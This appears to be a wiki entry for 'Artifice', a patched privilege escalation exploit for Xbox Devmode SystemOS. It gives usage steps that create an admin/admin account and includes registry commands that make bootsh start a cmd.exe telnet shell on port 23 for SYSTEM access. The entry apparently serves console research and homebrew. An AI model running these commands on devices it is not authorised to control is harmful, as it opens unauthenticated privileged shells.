| Release date | 10.09.2023 |
| Author | Kudayasu |
| Classification | Devmode SystemOS privilege escalation |
| Patched | Yes |
| Patch date | 08/28/2024 |
| First patched system version | 10.0.26100.1968 (xb_flt_2408ge.240821-1830) |
| Source | https://kudayasu.github.io/an-autopsy-of-artifice/ |
| Download | https://github.com/Kudayasu/Artifice/releases/latest |
A completely privilege escalation exploit for Devmode, granting an admin account in SystemOS.
- Windows host computer
- Console in devmode (UWP devkit or superior)
Download the artifice release, make sure your console is reachable from the host computer, run the program and type the console IP. Then launch the exploit.
If it succeeds, an account called admin with password admin will be created in SystemOS. You can ssh to this account.
In order to gain SYSTEM shell access, we need to leverage bootsh to telnet into the Xbox, as described here.
- SSH into your console using Command Prompt or PowerShell with the Admin account created by Artiface.
- Execute the following commands on the SSH connection as Admin:
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Bootsh\Parameters\Commands /v Xrun /t REG_SZ /d "telnetd.exe cmd.exe 23" /f
sc start bootsh
- Wait around 10 seconds to ensure that the telnet service has started.
- Reset the registry key back to its original state:
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Bootsh\Parameters\Commands /v Xrun /t REG_SZ /d "xrun.exe SystemBootTasks" /f
- Now you can start a telnet session using PuTTY or a similar telnet client using Port 23
- Profit.